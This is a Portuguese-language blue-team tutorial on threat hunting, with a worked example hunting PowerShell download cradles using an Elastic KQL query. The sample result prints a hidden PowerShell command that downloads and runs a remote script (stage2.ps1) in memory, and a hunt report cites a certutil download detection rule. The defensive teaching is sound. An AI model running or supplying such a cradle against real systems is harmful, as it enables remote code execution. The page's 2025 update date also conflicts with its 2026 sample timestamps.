Avançado Defesa (Blue Team) Atualizado em 25 de jun. de 2025

Threat Hunting — busca proativa de ameaças

Threat hunting é a busca proativa e humana por ameaças que escaparam de ferramentas automáticas. Em vez de esperar um alerta, o analista formula hipóteses baseadas em inteligência de ameaças e vai atrás dos dados.

Por que huntar?

Ferramentas automáticas detectam padrões conhecidos. Atacantes sofisticados usam técnicas novas ou vivem-do-terreno (LOLBins). Um hunter experiente encontra o que o SIEM não regrou ainda.

O loop de threat hunting

1. Hipótese
      │
      ▼
2. Coleta de dados ──► logs, EDR telemetria, PCAP, AD events
      │
      ▼
3. Investigação ──► queries, scripts, visualização
      │
      ▼
4. Descoberta ──► TTP confirmada ou hipótese descartada
      │
      ▼
5. Resposta / nova regra de detecção

Fontes de hipóteses

CTI (Cyber Threat Intelligence): relatórios de grupos APT, feeds de IoC.
MITRE ATT&CK: “será que T1059 (Command-Line Interface) está sendo abusada aqui?”
Anomalias internas: host incomum fazendo DNS lookup volumoso.
Incidentes anteriores: atacante pode ter deixado rastros além do que foi remediado.

Exemplo de hunt: PowerShell suspeito

Hipótese: “Um atacante está usando PowerShell com download cradle para executar código em memória.”

Query (Elastic KQL):
process.name: "powershell.exe"
AND process.command_line: (*DownloadString* OR *IEX* OR *Invoke-Expression*)
AND NOT process.parent.name: ("sccm.exe" OR "wsus.exe")

Resultado:
host: WIN-DEV-03
user: pedro.silva
cmd: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.99/stage2.ps1')"
timestamp: 2026-06-24T03:17:42Z

Download às 3h da madrugada, em modo hidden, de IP interno. Alta suspeita. Escalona para IR.

Técnicas de análise

Stack counting: agrupar por campo e procurar outliers (ex: processos filhos raros de winword.exe).
Frequency analysis: processos que aparecem em poucos hosts são mais suspeitos.
Timeline analysis: ordenar eventos de um host por tempo para ver cadeia de execução.
Graph analysis: mapear conexões laterais entre hosts comprometidos.

Ferramentas do hunter

Ferramenta	Uso
Elastic / KQL	Queries em logs e EDR
Velociraptor	Coleta de telemetria em escala
OSQuery	SQL sobre estado do sistema
Zeek	Análise de tráfego de rede
YARA	Caça de malware em arquivos

Documentando o hunt

Todo hunt deve gerar um artefato:

Hunt Report:
  Hipótese: uso de LOLBins para evasão de AV
  Período: 2026-06-01 a 2026-06-25
  Fontes: Windows Event Logs, EDR telemetry
  Resultado: negativo (hipótese descartada)
  Nova regra criada: sim — alerta em certutil.exe com download flag

Hunts que não encontram nada também têm valor: aumentam a confiança no ambiente e geram novas regras.